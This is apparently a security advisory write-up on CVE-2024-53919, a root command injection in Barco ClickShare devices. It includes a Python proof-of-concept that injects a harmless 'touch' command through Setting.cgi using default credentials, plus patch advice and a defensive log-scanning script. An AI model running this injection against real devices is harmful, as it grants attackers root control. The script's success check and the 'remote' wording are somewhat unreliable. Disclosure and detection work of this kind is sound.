CVE-2024-53919 - Critical Injection Vulnerability in Barco ClickShare Devices Allowing Root Access

Recently, a critical security vulnerability (CVE-2024-53919) has been discovered in Barco ClickShare CX-30/20, C-5/10, and ClickShare Bar Pro and Core wireless conferencing and presentation models. These devices are widely used in business environments, conference rooms, and other public spaces. The vulnerability allows attackers with physical access to the device, or local administrators of the webUI, to trigger operating system-level command execution and gain root access to the system.

Code Snippet

This vulnerability was discovered by analyzing the web-based management interface of the affected ClickShare devices. The issue lies specifically in the parameters accepted by the "Setting.cgi" script, which allow remote command injection. A sample proof of concept exploit can be seen in this code snippet:

#!/usr/bin/python3

import requests

# Replace IP_ADDRESS with the address of the target ClickShare device.
target = "http://IP_ADDRESS/"
# The injected command; it only creates a marker file as proof of execution.
payload = "touch /tmp/Pwned"

# Setting.cgi takes the admin credentials plus a "var" command whose value
# argument (arg2) is passed to the operating system without sanitization.
data = {
    "user": "admin",
    "password": "admin",
    "cmd": "var",
    "arg1": "key",
    "arg2": payload,
}

try:
    r = requests.post(target + "Setting.cgi", data=data)
    # A 200 response only means the request was accepted by the CGI script.
    if r.status_code == 200:
        print("Command executed successfully.")
    else:
        print("Error: Command not executed.")
except requests.exceptions.RequestException as e:
    print(f"Error: {str(e)}")

This example exploits the vulnerability to create a new file named "Pwned" in the /tmp directory of the target device. Note that the IP_ADDRESS placeholder in this script must be replaced with the IP address of the target ClickShare device.

References

- Barco ClickShare Security Advisory (Barco Website)

Exploit Details

The impact of this vulnerability is alarming as it can allow attackers to gain full control over the affected device and execute arbitrary commands with root privileges. This can potentially lead to further compromise of the network connected to the device, unauthorized access to sensitive information, or even sabotage of meetings and presentations.

Affected devices are all Barco ClickShare CX-30/20, C-5/10, and ClickShare Bar Pro and Core models running firmware before version 2.21.1. To fix this vulnerability, it is recommended to update the firmware of the affected devices to version 2.21.1 or newer, available on the official Barco ClickShare website. Additionally, it is essential to secure physical access to the device and to restrict webUI access to trusted personnel only.
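For defenders, the two facts above (the Setting.cgi "cmd=var" parameters described in the Code Snippet section and the 2.21.1 fix version) translate directly into a triage check. The following is an added example, not code from the original post or from Barco: it compares a reported firmware version against 2.21.1 and scans constructed web-access log lines (the log format and the "plain token" allowlist for legitimate arg2 values are assumptions to tune for your environment) for Setting.cgi requests whose value argument carries shell syntax.

```python
import re
from urllib.parse import parse_qs

# First firmware version containing the fix, as stated in the advisory text.
FIXED_VERSION = (2, 21, 1)

# Assumption: legitimate values for a settings key are plain tokens. Anything
# outside this conservative allowlist (spaces, slashes, ; | & $ ` ...) is flagged.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9._:-]*$")

# Constructed log format (not the device's own): ts src METHOD path "body"
LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "(.*)"$')

# Constructed sample lines: a benign setting change, a page view, a PoC-style request.
SAMPLE_LOG = [
    '2024-12-10T02:15:17Z 10.0.0.5 POST /Setting.cgi "user=admin&password=admin&cmd=var&arg1=hostname&arg2=room-4b"',
    '2024-12-10T02:16:02Z 10.0.0.9 GET /index.html ""',
    '2024-12-10T02:17:40Z 10.0.0.7 POST /Setting.cgi "user=admin&password=admin&cmd=var&arg1=key&arg2=touch+%2Ftmp%2FPwned"',
]

def parse_version(text):
    """Turn '2.20.3' into (2, 20, 3); stops at the first non-numeric part."""
    parts = []
    for piece in text.strip().split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)

def firmware_is_affected(version):
    """True when the reported firmware predates the 2.21.1 fix."""
    v = parse_version(version)
    return bool(v) and v < FIXED_VERSION

def request_is_suspicious(method, path, body):
    """Flag a Setting.cgi POST whose 'cmd=var' value argument is not a plain token."""
    if method != "POST" or not path.rstrip("/").endswith("Setting.cgi"):
        return False
    form = parse_qs(body, keep_blank_values=True)  # decodes '+' and %xx escapes
    if form.get("cmd", [""])[0] != "var":
        return False
    return not SAFE_VALUE.match(form.get("arg2", [""])[0])

def scan_log(lines):
    """Return (timestamp, source, decoded arg2) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # malformed line; a real tool would count these
        ts, src, method, path, body = m.groups()
        if request_is_suspicious(method, path, body):
            hits.append((ts, src, parse_qs(body)["arg2"][0]))
    return hits
```

Run scan_log over your proxy or device access logs; each hit is a request worth correlating with the inventory check from firmware_is_affected.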

Conclusion

The discovery of this critical injection vulnerability in Barco ClickShare wireless conferencing and presentation devices underscores the importance of regular security updates and keeping firmware up to date. Risk mitigation measures should be implemented, such as restricting physical access to devices and limiting webUI access to authorized users. Updating the firmware to version 2.21.1 or newer will address this issue and help protect the device from unauthorized access or misuse.

Timeline

Published on: 12/10/2024 02:15:17 UTC
Last modified on: 12/10/2024 16:15:23 UTC